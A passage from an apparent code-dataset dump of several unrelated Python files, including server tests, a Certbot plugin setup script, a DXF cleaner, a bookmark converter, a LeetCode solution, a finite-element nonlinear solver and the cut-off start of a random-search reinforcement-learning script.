test_ruby_application_body_empty(self):\n self.load('body_empty')\n\n self.assertEqual(self.get()['body'], '0\\r\\n\\r\\n', 'body empty')\n\n def test_ruby_application_body_array(self):\n self.load('body_array')\n\n self.assertEqual(self.get()['body'], '0123456789', 'body array')\n\n def test_ruby_application_body_large(self):\n self.load('mirror')\n\n body = '0123456789' * 1000\n\n self.assertEqual(self.post(body=body)['body'], body, 'body large')\n\n @unittest.expectedFailure\n def test_ruby_application_body_each_error(self):\n self.load('body_each_error')\n\n self.assertEqual(self.get()['status'], 500, 'body each error status')\n\n self.stop()\n\n self.assertIsNotNone(\n self.search_in_log(r'\\[error\\].+Failed to run ruby script'),\n 'body each error')\n\n def test_ruby_application_body_file(self):\n self.load('body_file')\n\n self.assertEqual(self.get()['body'], 'body\\n', 'body file')\n\n def test_ruby_keepalive_body(self):\n self.load('mirror')\n\n (resp, sock) = self.post(headers={\n 'Connection': 'keep-alive',\n 'Content-Type': 'text/html',\n 'Host': 'localhost'\n }, start=True, body='0123456789' * 500)\n\n self.assertEqual(resp['body'], '0123456789' * 500, 'keep-alive 1')\n\n resp = self.post(headers={\n 'Connection': 'close',\n 'Content-Type': 'text/html',\n 'Host': 'localhost'\n }, sock=sock, body='0123456789')\n\n self.assertEqual(resp['body'], '0123456789', 'keep-alive 2')\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"test/test_ruby_application.py","file_name":"test_ruby_application.py","file_ext":"py","file_size_in_byte":8530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"515866223","text":"import sys\n\nfrom setuptools import setup\nfrom setuptools import find_packages\n\nversion = '0.0.1'\n\ninstall_requires = [\n 'f5-icontrol-rest',\n]\n\ndef read_file(filename, encoding='utf8'):\n \"\"\"Read unicode from given file.\"\"\"\n with codecs.open(filename, encoding=encoding) as fd:\n return fd.read()\n\nhere = os.path.abspath(os.path.dirname(__file__))\nreadme = read_file(os.path.join(here, 'README.rst'))\n\ninstall_requires = [\n 'certbot-bigip',\n 'letsencrypt=={0}'.format(version),\n]\n\nsetup(\n name='certbot-bigip',\n version=version,\n description='F5 BIG-IP plugin for Certbot',\n url='https://github.com/colin-stubbs/certbot-bigip',\n author='Colin Stubbs',\n author_email='cstubbs@gmail.com',\n license='Apache License 2.0',\n classifiers=[\n 'Development Status :: 3 - Alpha',\n 'Environment :: Plugins',\n 'Intended Audience :: System Administrators',\n 'License :: OSI Approved :: Apache Software License',\n 'Operating System :: POSIX :: Linux',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 2',\n 'Programming Language :: Python :: 2.7',\n 'Topic :: Internet :: WWW/HTTP',\n 'Topic :: Security',\n 'Topic :: System :: Installation/Setup',\n 'Topic :: System :: Networking',\n 'Topic :: System :: Systems Administration',\n 'Topic :: Utilities',\n ],\n\n packages=find_packages(),\n include_package_data=True,\n install_requires=install_requires,\n)\n","sub_path":"letsencrypt-bigip/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"68714311","text":"# CleanDXF v3.0\n\n# RGB to ACI table here: https://gohtx.com/acadcolors.php\n\nfrom collections import namedtuple\nimport ezdxf, sys\n\nfrom ezdxf.layouts.layout import Modelspace\n\nif len(sys.argv) < 2: exit() # Exit when there is no file\n\n\ndef main():\n\n for file in sys.argv[1:]:\n\n doc = ezdxf.readfile(file)\n msp = doc.modelspace()\n\n entities = Entities(msp)\n query = entities.query()\n\n Entities.delete(query.bend)\n Entities.delete(query.dims)\n\n doc.save()\n\n\nclass Entities:\n\n def __init__(self, msp) -> None: \n self.msp = msp\n\n def query(self):\n \n Query = namedtuple(\"Entities\", [\"bend\", \"dims\"]) \n\n # Query all entities on a layer named BEND\n bend_lines = self.msp.query('*[layer==\"BEND\"]')\n\n # Add entities on a layer named BEND_EXTENT\n bend_lines.extend('*[layer==\"BEND_EXTENT\"]')\n\n # Query all pink entities (255,0,255)\n dimensions = self.msp.query('*[color==6]')\n\n return Query(\n bend_lines,\n dimensions,\n )\n\n\n def delete(self, entities):\n\n for entity in entities: self.msp.delete_entity(entity)\n\nif __name__ == '__main__':\n main()","sub_path":"CleanDXF_v3.py","file_name":"CleanDXF_v3.py","file_ext":"py","file_size_in_byte":1201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"440129233","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport matplotlib\n\n# Look pretty...\n# matplotlib.style.use('ggplot')\nplt.style.use('ggplot')\n\nwheat = pd.read_csv(\"C:/Users/mckinns/Documents/GitHub/DAT210x/Module3/Datasets/wheat.data\", \n index_col=0, header=0)\n\ndf_wh = pd.DataFrame(wheat)\ns1 = df_wh[['perimeter', 'area']]\ns2 = df_wh[['groove','asymmetry' ]]\n\ns1.plot.hist(alpha=0.75)\ns2.plot.hist(alpha=0.75)\n\nplt.show()\n\n","sub_path":"LAB3_assignment1.py","file_name":"LAB3_assignment1.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"601926660","text":"import sqlite3\nimport json\nimport urllib.parse as urlparse\nimport sys\nimport datetime\n\n# you know, I should post this in a gist\n\njsonexpt={\n\t\"bookmarks\":[],\n\t\"folders\":[],\n}\n\nif len(sys.argv) == 2:\n\twith sqlite3.connect(sys.argv[1]) as db:\n\t\tdb.row_factory = sqlite3.Row\n\t\tc = db.cursor()\n\t\tget_parent_c = db.cursor()\n\n\t\tfor row in c.execute('SELECT * from bookmarks'):\n\t\t\t#print(row, type(row))\n\t\t\tif row['is_folder'] == 0:\n\t\t\t\tbkobj={}\n\t\t\t\tbkobj[\"visitedDate\"]=int(row['date'] / 1000)\n\t\t\t\tbkobj[\"creationDate\"]=int(row['created'] / 1000)\n\t\t\t\tbkobj[\"visits\"]=row['visits']\n\t\t\t\tbkobj[\"url\"]=urlparse.quote(row['url'])\n\t\t\t\tbkobj[\"title\"]=urlparse.quote(row['title'])\n\t\t\t\tif row['parent_crc_id'] == 0:\n\t\t\t\t\tbkobj[\"folderId\"]=-1\n\t\t\t\telse:\n\t\t\t\t\t#print(row['parent_crc_id'])\n\t\t\t\t\tget_parent_c.execute('SELECT * from bookmarks WHERE crc_id=?', (row['parent_crc_id'],))\n\t\t\t\t\tprow = get_parent_c.fetchone()\n\t\t\t\t\tbkobj[\"folderId\"]=int(prow['_id'])\n\t\t\t\tjsonexpt[\"bookmarks\"].append(bkobj)\n\n\t\t\telse:\n\t\t\t\tbkobj={}\n\t\t\t\tbkobj[\"title\"]=urlparse.quote(row['title'])\n\t\t\t\tif row['parent_crc_id'] == 0:\n\t\t\t\t\tbkobj[\"parentId\"]=-1\n\t\t\t\telse:\n\t\t\t\t\tget_parent_c.execute('SELECT * from bookmarks WHERE crc_id=?', (row['parent_crc_id'],))\n\t\t\t\t\tprow = get_parent_c.fetchone()\n\t\t\t\t\tbkobj[\"parentId\"]=int(prow['_id'])\n\t\t\t\tbkobj[\"title\"]=urlparse.quote(row['title'])\n\t\t\t\tbkobj[\"id\"]=int(row['_id'])\n\t\t\t\tjsonexpt[\"folders\"].append(bkobj)\n\n\twith open(sys.argv[1].replace(\"db\",\"json\"), 'w', encoding='utf-8') as wf:\n\t\tjson.dump(jsonexpt, wf)\n","sub_path":"converters/nextbrowser2tint.py","file_name":"nextbrowser2tint.py","file_ext":"py","file_size_in_byte":1509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"590079137","text":"\"\"\"\nhttps://leetcode.com/problems/making-a-large-island/\n\n1. Check all island, compute the area and index them.\n2. Try to change 0 to 1 one-by-one, check the neighbor islands, compute the area.\n\nTime complexity: O(n^2)\n\"\"\"\nclass Solution:\n def largestIsland(self, grid) -> int:\n N = len(grid)\n def move(x, y):\n for i, j in ((1, 0), (-1, 0), (0, 1), (0, -1)):\n if 0 <= x + i < N and 0 <= y + j < N:\n yield x + i, y + j\n\n def dfs(x, y, index):\n area = 0\n grid[x][y] = index\n for new_x, new_y in move(x, y):\n if grid[new_x][new_y] == 1:\n area += dfs(new_x, new_y, index)\n return area + 1\n\n index = 2\n area = {}\n for x in range(N):\n for y in range(N):\n if grid[x][y] == 1:\n area[index] = dfs(x, y, index)\n index += 1\n\n res = max(area.values() or [0])\n for x in range(N):\n for y in range(N):\n if grid[x][y] == 0:\n possible_idx = set()\n for new_x, new_y in move(x, y):\n if grid[new_x][new_y] > 1:\n possible_idx.add(grid[new_x][new_y])\n res = max(res, sum(area[idx] for idx in possible_idx) + 1)\n\n return res\n\nsol = Solution()\ngrid = [[1, 0], [0, 1]]\nassert sol.largestIsland(grid) == 3\ngrid = [[1, 1], [1, 0]]\nassert sol.largestIsland(grid) == 4\ngrid = [[1, 1], [1, 1]]\nassert sol.largestIsland(grid) == 4\n","sub_path":"0827_MakingALargeIsland.py","file_name":"0827_MakingALargeIsland.py","file_ext":"py","file_size_in_byte":1586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"540003112","text":"# --- Internal Imports ---\r\nfrom .solver import solveLinearSystem\r\n\r\n# --- Python Imports ---\r\nimport numpy as np\r\nimport scipy.sparse as sparse\r\n\r\n# ---------------------------------------------------------\r\ndef newtonIteration( targetSystem,\r\n initialSolution,\r\n tolerance=1e-5,\r\n maxIterations=10,\r\n solverKWArgs={},\r\n verbose=False,\r\n convergencePlot=None ):\r\n '''\r\n Attempts to find a root of a target function, using 1st order linearization.\r\n The target function must return a 1D numpy array, while the target derivative\r\n must return a matching nonsingular square numpy ndarray. Both the function and\r\n derivative must expect the initial state (1D numpy array) as argument (and no other\r\n positional arguments).\r\n '''\r\n # Initialize\r\n solution = initialSolution.copy()\r\n functionValue, derivative = targetSystem(solution)\r\n iterationCounter = 1\r\n targetNorm = np.linalg.norm(functionValue)\r\n\r\n if verbose:\r\n print( \"Initial target\\t: %.3E\" % targetNorm )\r\n if convergencePlot is not None:\r\n convergencePlot(targetNorm)\r\n\r\n # Loop\r\n while True:\r\n # Check if iteration limit exceeded\r\n if iterationCounter >= maxIterations:\r\n print( \"Newton iteration failed to converge after %i iterations\" % iterationCounter )\r\n raise StopIteration\r\n\r\n # Step\r\n solution -= solveLinearSystem( derivative, functionValue, **solverKWArgs )\r\n functionValue, derivative = targetSystem(solution)\r\n\r\n # Check convergence\r\n targetNorm = np.linalg.norm(functionValue)\r\n if verbose:\r\n print( \"Target norm\\t: %.3E\" % targetNorm )\r\n if convergencePlot is not None:\r\n convergencePlot(targetNorm)\r\n if targetNorm < tolerance:\r\n break\r\n\r\n iterationCounter += 1\r\n \r\n return solution\r\n\r\n\r\n\r\ndef reintegrate( model, \r\n loadFactor, \r\n solution,\r\n stiffness=True,\r\n load=True,\r\n mass=True,\r\n geometricStiffness=True ):\r\n '''\r\n Function that does all the necessary operations for updating \r\n the model to the current load factor and solution\r\n '''\r\n # Set up arguments for stationary or transient models\r\n keywordArgs = { \"stiffness\" : stiffness,\r\n \"load\" : load,\r\n \"geometricStiffness\" : geometricStiffness }\r\n\r\n if hasattr( model, \"mass\" ):\r\n keywordArgs[\"mass\"] = mass\r\n\r\n # Wipe matrices and set solution function\r\n model.resetMatrices( **keywordArgs )\r\n solutionFunction = lambda x: model.sample(solution, x)\r\n\r\n # Compute structural matrices\r\n model.integrate( solutionFunction, \r\n solution, \r\n **keywordArgs )\r\n\r\n # Apply boundaries\r\n for boundary in model.boundaries:\r\n model.applyBoundaryCondition( boundary )\r\n\r\n\r\n\r\ndef stationaryLoadControl( model,\r\n initialSolution,\r\n baseIncrement=0.5,\r\n minIncrement=0.05,\r\n maxIncrement=1.0,\r\n maxIncrements=50,\r\n maxCorrections=10,\r\n tolerance=1e-5,\r\n verbose=True,\r\n axes=None,\r\n convergencePlot=None ):\r\n '''\r\n Solves a nonlinear FEModel using a load controlled predictor and a constant load corrector\r\n '''\r\n # ---------------------------------------------------------\r\n # Initialize arguments\r\n u = initialSolution.copy()\r\n loadFactors = []\r\n\r\n if convergencePlot is not None:\r\n convergencePlot.start()\r\n\r\n # Define inputs for the Newton iteration\r\n def updateSystem(solution, loadFactor):\r\n reintegrate( model,\r\n loadFactor,\r\n solution,\r\n mass=False)\r\n residual = model.stiffness.dot(solution) - loadFactor*model.load\r\n tangentStiffness = model.stiffness + model.geometricStiffness\r\n return residual, tangentStiffness\r\n\r\n # Initialize structural matrices\r\n reintegrate( model,\r\n 0.0,\r\n initialSolution,\r\n mass=False)\r\n \r\n # ---------------------------------------------------------\r\n # Increment loop\r\n increment = maxIncrement\r\n lastControl = 0.0\r\n control = lastControl + increment\r\n incrementIndex = -1\r\n\r\n while control < 1.0:\r\n\r\n # Update control\r\n incrementIndex += 1\r\n control = lastControl + increment\r\n\r\n if control > 1.0:\r\n control = 1.0\r\n\r\n # Print iteration header\r\n if verbose:\r\n print( \"Increment# \" + str(incrementIndex) + \" \" + \"-\"*(35-11-len(str(incrementIndex))-1) )\r\n\r\n # Predict\r\n controlIncrement = control-lastControl\r\n #u += solveLinearSystem( model.stiffness + model.geometricStiffness, controlIncrement * model.load )\r\n uMid = u + 0.5 * solveLinearSystem( model.stiffness + model.geometricStiffness, controlIncrement * model.load )\r\n reintegrate( model, \r\n control, \r\n uMid,\r\n mass=False )\r\n uNew = u + solveLinearSystem( model.stiffness + model.geometricStiffness, controlIncrement * model.load )\r\n\r\n # Correct\r\n try:\r\n uNew = newtonIteration( lambda solution: updateSystem(solution, control),\r\n uNew,\r\n tolerance=tolerance,\r\n maxIterations=maxCorrections,\r\n verbose=True,\r\n convergencePlot=convergencePlot)\r\n except StopIteration:\r\n increment /= 2.0\r\n if increment < minIncrement:\r\n raise RuntimeError( \"Nonlinear iteration failed to converge\" )\r\n continue\r\n\r\n # Update\r\n lastControl = control\r\n u = uNew.copy()\r\n loadFactors.append(control)\r\n\r\n if 2.0*increment < maxIncrement:\r\n increment *= 2.0\r\n\r\n # Plot if requested\r\n if axes is not None:\r\n axes.plot( np.linspace( 0, 1, num=100 ), model.sample( u, np.linspace( 0, 1, num=100 ) ) )\r\n\r\n # ---------------------------------------------------------\r\n # Decorate plot if requested\r\n if axes is not None:\r\n axes.legend( [ \"Control parameter = %.2f\" % l for l in loadFactors ] )\r\n axes.set_xlabel( \"x [m]\" )\r\n axes.set_ylabel( \"T [C]\" )\r\n axes.set_title( \"Temperature Field\" )\r\n\r\n if convergencePlot is not None:\r\n convergencePlot.finish()\r\n \r\n return u\r\n\r\n\r\n\r\n\r\ndef stationaryFixedPointIteration( model,\r\n initialSolution,\r\n loadFactors=None,\r\n maxCorrections=10,\r\n tolerance=1e-5,\r\n verbose=True,\r\n axes=None,\r\n convergencePlot=None ):\r\n '''\r\n Solves a nonlinear FEModel using fixed point iterations\r\n '''\r\n # ---------------------------------------------------------\r\n # Initialize arguments\r\n u = initialSolution\r\n\r\n if loadFactors is None:\r\n loadFactors = np.linspace( 0.0, 1.0, num=5+1 )\r\n\r\n if convergencePlot is not None:\r\n convergencePlot.start()\r\n \r\n # ---------------------------------------------------------\r\n # Increment loop\r\n for incrementIndex, control in enumerate(loadFactors):\r\n\r\n # Print iteration header\r\n if verbose:\r\n print( \"\\nIncrement# \" + str(incrementIndex) + \" \" + \"-\"*(35-11-len(str(incrementIndex))-1) )\r\n\r\n # Check if first run (initialization)\r\n if incrementIndex == 0:\r\n reintegrate( model, \r\n loadFactors[0], \r\n u,\r\n mass=False,\r\n geometricStiffness=False )\r\n continue\r\n\r\n # Correction loop\r\n for correctionIndex in range(maxCorrections):\r\n # Correct\r\n u = solveLinearSystem( model.stiffness, control * model.load )\r\n\r\n # Update residual and check termination criterion\r\n reintegrate( model, \r\n control, \r\n u,\r\n mass=False,\r\n geometricStiffness=False )\r\n residual = model.stiffness.dot(u) - control*model.load\r\n resNorm = np.linalg.norm(residual)\r\n if verbose:\r\n print( \"Current residual\\t: %.3E\" % resNorm )\r\n if convergencePlot is not None:\r\n convergencePlot( resNorm )\r\n if resNorm < tolerance:\r\n break\r\n elif correctionIndex == maxCorrections-1:\r\n print( \"Warning: corrector failed to converge within the specified tolerance\" )\r\n\r\n # Plot if requested\r\n if axes is not None:\r\n axes.plot( np.linspace( 0, 1, num=100 ), model.sample( u, np.linspace( 0, 1, num=100 ) ) )\r\n\r\n # ---------------------------------------------------------\r\n # Decorate plot if requested\r\n if axes is not None:\r\n axes.legend( [ \"Control parameter = %.2f\" % l for l in loadFactors[1:] ] )\r\n axes.set_xlabel( \"x [m]\" )\r\n axes.set_ylabel( \"T [C]\" )\r\n axes.set_title( \"Temperature Field\" )\r\n\r\n if convergencePlot is not None:\r\n convergencePlot.finish()\r\n \r\n return u\r\n\r\n\r\n\r\n\r\ndef transientResidual( model, \r\n solution, \r\n loadFactor, \r\n massInverse,\r\n theta,\r\n dt,\r\n previousState ):\r\n temp = theta*massInverse.dot(model.stiffness.todense()) + 1.0/dt*np.eye(model.size)\r\n return np.ravel( temp.dot(solution) - theta*massInverse.dot(loadFactor*model.load) + previousState )\r\n\r\n\r\n\r\ndef transientResidualDerivative( model, \r\n solution, \r\n loadFactor, \r\n massInverse, \r\n theta, \r\n dt ):\r\n '''\r\n Compute the derivative of the residual with respect to the solution coefficients.\r\n See the readme for a better view: eq.(23)\r\n '''\r\n # Preallocate\r\n temp = np.zeros(massInverse.shape)\r\n MKu = massInverse.dot( model.stiffness.dot(solution) )\r\n Mq = massInverse.dot(model.load)\r\n temperature = lambda x: model.sample(solution, x)\r\n\r\n # Integrate\r\n for e in model.elements:\r\n dCapacityCache = e.integrator.createCache( lambda xi: e.capacityDerivative( temperature(e.toGlobalCoordinates(xi)) ),\r\n e.basisFunctions.domain )\r\n for i in range(len(e.basisFunctions)):\r\n cache0 = dCapacityCache * e._basisCache[i]\r\n for l in range(len(e.basisFunctions)):\r\n cache1 = cache0 * e._basisCache[l]\r\n for j in range(len(e.basisFunctions)):\r\n integral = e._jacobian * e.integrator.integrateCached(\r\n lambda xi: 1.0,\r\n cache1 * e._basisCache[j],\r\n e.basisFunctions.domain\r\n )\r\n temp[e.DoFs[i], e.DoFs[l]] += integral * (loadFactor*Mq[e.DoFs[j]] - MKu[e.DoFs[j]])\r\n \r\n # Compute derivative\r\n return theta * massInverse.dot( \\\r\n model.stiffness.todense() \\\r\n + model.geometricStiffness.todense() \\\r\n + temp ) \\\r\n + np.eye(model.size)/dt\r\n\r\n\r\n\r\ndef transientLoadControl( model,\r\n initialSolution,\r\n initialStiffness,\r\n initialMass,\r\n initialLoad,\r\n dt,\r\n baseIncrement=0.5,\r\n minIncrement=0.05,\r\n maxIncrement=1.0,\r\n maxIncrements=50,\r\n maxCorrections=10,\r\n tolerance=1e-5,\r\n theta=0.5,\r\n verbose=True,\r\n axes=None,\r\n convergencePlot=None ):\r\n '''\r\n Solves a nonlinear transient FEModel using a load controlled predictor and a constant load corrector\r\n '''\r\n # ---------------------------------------------------------\r\n # Initialize arguments\r\n u = initialSolution.copy()\r\n loadFactors = []\r\n\r\n if convergencePlot is not None:\r\n convergencePlot.start()\r\n\r\n DT = 1.0/dt * sparse.eye(model.size)\r\n previousState = (1.0-theta) * sparse.linalg.inv(initialMass).dot( initialLoad - initialStiffness.dot(u) ) \\\r\n + DT.dot(u)\r\n\r\n # Define inputs for the Newton iteration\r\n def updateSystem(solution, loadFactor):\r\n reintegrate( model,\r\n loadFactor,\r\n solution)\r\n\r\n mInv = np.zeros( model.mass.shape, dtype=model.mass.dtype )\r\n sparse.linalg.inv(model.mass).todense( out=mInv )\r\n\r\n residual = transientResidual( model,\r\n solution,\r\n loadFactor,\r\n mInv,\r\n theta,\r\n dt,\r\n -1.0*previousState)\r\n tangentStiffness = transientResidualDerivative( model,\r\n solution,\r\n loadFactor,\r\n mInv,\r\n theta,\r\n dt)\r\n return residual, tangentStiffness\r\n\r\n # Initialize structural matrices\r\n reintegrate( model,\r\n 0.0,\r\n initialSolution)\r\n \r\n # ---------------------------------------------------------\r\n # Increment loop\r\n increment = maxIncrement\r\n lastControl = 0.0\r\n control = lastControl + increment\r\n incrementIndex = -1\r\n\r\n while control < 1.0 or incrementIndex < 0:\r\n\r\n # Update control\r\n incrementIndex += 1\r\n control = lastControl + increment\r\n\r\n if control > 1.0:\r\n control = 1.0\r\n\r\n # Print iteration header\r\n if verbose:\r\n print( \"Increment# \" + str(incrementIndex) + \" \" + \"-\"*(35-11-len(str(incrementIndex))-1) )\r\n\r\n # Predict\r\n controlIncrement = control-lastControl\r\n tangentStiffness = updateSystem( u, control )[1]\r\n uMid = u + 0.5 * solveLinearSystem( tangentStiffness, controlIncrement * model.load, sparse=False )\r\n\r\n tangentStiffness = updateSystem( uMid, control )[1]\r\n uNew = u + solveLinearSystem( tangentStiffness, controlIncrement * model.load, sparse=False )\r\n\r\n # Correct\r\n try:\r\n uNew = newtonIteration( lambda solution: updateSystem(solution, control),\r\n uNew,\r\n tolerance=tolerance,\r\n maxIterations=maxCorrections,\r\n solverKWArgs={\"sparse\" : False},\r\n verbose=verbose,\r\n convergencePlot=convergencePlot)\r\n except StopIteration:\r\n increment /= 2.0\r\n if increment < minIncrement:\r\n raise RuntimeError( \"Nonlinear iteration failed to converge\" )\r\n continue\r\n\r\n # Update\r\n lastControl = control\r\n u = uNew.copy()\r\n loadFactors.append(control)\r\n \r\n if 2.0*increment < maxIncrement:\r\n increment *= 2.0\r\n\r\n # Plot if requested\r\n if axes is not None:\r\n axes.plot( np.linspace( 0, 1, num=100 ), model.sample( u, np.linspace( 0, 1, num=100 ) ) )\r\n\r\n # ---------------------------------------------------------\r\n # Decorate plot if requested\r\n if axes is not None:\r\n axes.legend( [ \"Control parameter = %.2f\" % l for l in loadFactors ] )\r\n axes.set_xlabel( \"x [m]\" )\r\n axes.set_ylabel( \"T [C]\" )\r\n axes.set_title( \"Temperature Field\" )\r\n\r\n if convergencePlot is not None:\r\n convergencePlot.finish()\r\n \r\n return u\r\n\r\n\r\n\r\n\r\ndef transientFixedPointIteration( model,\r\n initialSolution,\r\n initialStiffness,\r\n initialMass,\r\n initialLoad,\r\n dt,\r\n loadFactors=None,\r\n maxCorrections=10,\r\n tolerance=1e-5,\r\n theta=0.5,\r\n verbose=True,\r\n convergencePlot=None ):\r\n '''\r\n Solves a transient nonlinear FEModel using fixed point iterations\r\n ( Arguments are copied internally )\r\n '''\r\n # ---------------------------------------------------------\r\n # Initialize arguments\r\n u = initialSolution.copy()\r\n DT = 1.0/dt * sparse.eye(model.size)\r\n resNorm = None\r\n\r\n if loadFactors is None:\r\n loadFactors = [1.0]\r\n\r\n if convergencePlot is not None:\r\n convergencePlot.start()\r\n\r\n # Initialize system components\r\n initialState = (1.0-theta) * sparse.linalg.inv(initialMass).dot( initialLoad - initialStiffness.dot(u) ) \\\r\n + DT.dot(u)\r\n \r\n # ---------------------------------------------------------\r\n # Increment loop\r\n for incrementIndex, control in enumerate(loadFactors):\r\n\r\n # Print iteration header\r\n if verbose:\r\n print( \"\\nIncrement# \" + str(incrementIndex) + \" \" + \"-\"*(35-11-len(str(incrementIndex))-1) )\r\n\r\n # Correction loop\r\n for correctionIndex in range(maxCorrections):\r\n # Update residual\r\n reintegrate( model, \r\n control, \r\n u,\r\n geometricStiffness=False )\r\n\r\n massInverse = sparse.linalg.inv(model.mass)\r\n currentState = theta * massInverse.dot(model.stiffness) + DT\r\n currentLoad = theta * massInverse.dot(control * model.load) + initialState\r\n \r\n residual = currentState.dot(u) - currentLoad\r\n resNorm = np.linalg.norm(residual)\r\n \r\n # Check termination criterion and update output streams\r\n if verbose:\r\n print( \"Current residual\\t: %.3E\" % resNorm )\r\n if convergencePlot is not None:\r\n convergencePlot( resNorm )\r\n if resNorm < tolerance:\r\n break\r\n\r\n # Correct\r\n u = solveLinearSystem( currentState,\r\n currentLoad )\r\n\r\n # Compute final residual\r\n if resNorm > tolerance:\r\n reintegrate( model, \r\n loadFactors[-1], \r\n u,\r\n geometricStiffness=False )\r\n massInverse = sparse.linalg.inv(model.mass)\r\n currentState = theta * massInverse.dot(model.stiffness) + DT\r\n currentLoad = theta * massInverse.dot(loadFactors[-1] * model.load) + initialState\r\n residual = currentState.dot(u) - currentLoad\r\n resNorm = np.linalg.norm(residual)\r\n\r\n if verbose:\r\n print( \"Final residual\\t\\t: %.3E\" % resNorm )\r\n\r\n if resNorm > tolerance:\r\n print( \"Nonlinear solver failed to correct increment\" )\r\n\r\n # ---------------------------------------------------------\r\n #uDot = (u-initialSolution)/dt\r\n #eq = model.mass.dot(uDot) + model.stiffness.dot(u) - model.load\r\n #print( \"Eq residual\\t\\t: %.3E\" % np.linalg.norm(eq) )\r\n\r\n if resNorm > tolerance:\r\n raise RuntimeError( \"Nonlinear solver failed to converge\" )\r\n\r\n if convergencePlot is not None:\r\n convergencePlot.finish()\r\n \r\n return u","sub_path":"libraries/fem/python/modules/fem/numeric/nonlinearsolver.py","file_name":"nonlinearsolver.py","file_ext":"py","file_size_in_byte":21951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"591650601","text":"# Credit to Colin Skow\n# Adapted code from https://github.com/colinskow/move37/blob/master/ars/ars.py\n\nimport gym\nfrom gym import wrappers\nimport numpy as np\nimport os\n\n\nclass Normalizer():\n \"\"\"Normalize input values.\n Args:\n n_inputs: Number of input values\n \"\"\"\n\n def __init__(self, n_inputs):\n self.n = np.zeros(n_inputs)\n self.mean = np.zeros(n_inputs)\n self.mean_diff = np.zeros(n_inputs)\n self.var = np.zeros(n_inputs)\n\n def observe(self, x):\n \"\"\"\n Update mean and variance values based on observation values.\n\n Args:\n x(Numpy array): Observed value\n \"\"\"\n self.n += 1.0\n last_mean = self.mean.copy()\n self.mean += (x - self.mean) / self.n\n self.mean_diff += (x - last_mean) * (x - self.mean)\n self.var = (self.mean_diff / self.n).clip(min = 1e-2)\n\n def normalize(self, inputs):\n \"\"\"\n Normalize input values.\n\n Args:\n inputs(list of floats): Input values to normalize.\n\n Returns:\n Normalized input values with same shape and `inputs`.\n \"\"\"\n obs_mean = self.mean\n obs_std = np.sqrt(self.var)\n return (inputs - obs_mean) / obs_std\n \n\nclass Policy():\n \"\"\"Policy Agent should follow\n \n Args: \n input_size(int): Number of weights in input layer.\n output_size(int): Number of weights in output layer.\n \"\"\"\n\n def __init__(self, input_size, output_size):\n self.theta = np.zeros((output_size, input_size))\n\n def evaluate(self, input, noise, delta=None, direction=None):\n \"\"\"\n Add noise to weights based on gradient decent direction \n and return new theta values dot product (with input).\n\n Args:\n input(list of floats): Normalized observed input values.\n delta(list of floats): Relative step size (multiplied with noise) during gradient descent\n noise(float): Amount of delta distortion to add to weights.\n \n Returns:\n N-dimensional array of dot product of input and \n new theta values.\n \"\"\"\n\n if direction is None:\n return self.theta.dot(input)\n elif direction == \"+\":\n return (self.theta + noise * delta).dot(input)\n elif direction == \"-\":\n return (self.theta - noise * delta).dot(input)\n \n def sample_deltas(self, n_deltas):\n \"\"\"Sample random delta values from normal distribution for each input weight.\n\n Args:\n n_deltas(int): Number of deltas to sample for each input weight.\n \n Returns:\n List of lists of floats.\n \"\"\"\n\n return [np.random.randn(*self.theta.shape) for _ in range(n_deltas)]\n\n def update(self, rollouts, lr, sigma_rewards):\n \"\"\"\n Update theta values / weights based on learning rate and step size.\n\n Args:\n lr(float): Learning Rate\n rollouts(list of tuples): Positive rewards, Negative rewards, Delta values.\n sigma_rewards(float): Standard deviation of rewards\n \"\"\"\n \n # step for every theta (direction)\n step = np.zeros(self.theta.shape)\n n_best_deltas = len(rollouts)\n for r_pos, r_neg, delta in rollouts:\n step += (r_pos - r_neg) * delta\n self.theta += lr / (n_best_deltas * sigma_rewards) * step\n\nclass Model():\n \"\"\"Training Model for agent.\"\"\"\n def __init__(self):\n pass\n\n def make_env(self, env, video_freq, monitor_dir):\n \"\"\"Set Gym Environment\n \n Args:\n env(str): OpenAI Gym environment name.\n video_freq(int): How often (step frequency) to record video.\n monitor_dir(str): Directory to write log and video files to.\n \"\"\"\n\n self.env = gym.make(env)\n self.video_freq = video_freq\n should_record = lambda i: self.record_video\n self.record_video = False\n\n self.env = wrappers.Monitor(self.env, monitor_dir, \n video_callable=should_record, force=True)\n\n def set_normalizer(self, normalizer):\n \"\"\"Set Normalizer class to use for input normalizing.\"\"\"\n self.normalizer = normalizer\n\n # Explore the policy on one specific direction and over one episode\n def explore(self, noise, direction=None, delta=None):\n \"\"\"\n Run episode as exploration.\n\n Args:\n noise(float): Amount of delta distortion to add to weights.\n direction(str in ('-', '+') or None): Direction of next exploration.\n delta(list of floats): Relative step size (multiplied with noise) during gradient descent.\n\n Returns:\n Sum of rewards collected during episode.\n \"\"\"\n state = self.env.reset()\n done = False\n num_plays = 0\n sum_rewards = 0.0\n while not done and num_plays < self.episode_length:\n self.normalizer.observe(state)\n state = self.normalizer.normalize(state)\n action = self.policy.evaluate(state, noise, delta, direction)\n state, reward, done, _ = self.env.step(action)\n reward = max(min(reward, 1), -1)\n sum_rewards += reward\n num_plays += 1\n return sum_rewards\n\n def train(self, n_steps, n_deltas, n_best_deltas, noise, episode_length, lr):\n \"\"\"\n Train agent.\n\n Args:\n n_steps(int): Number of episodes.\n n_deltas(int): Number of deltas to use per episode.\n n_best_deltas(int): Number of best deltas to use for policy update.\n noise(float): Amount of delta distortion to add to weights.\n episode_length(int): Maximum number of actions to perform during an episode.\n lr(float): Learning rate of model.\n \"\"\"\n self.episode_length = episode_length\n self.noise = noise\n for step in range(n_steps):\n # initialize the random noise deltas and the positive/negative rewards\n deltas = 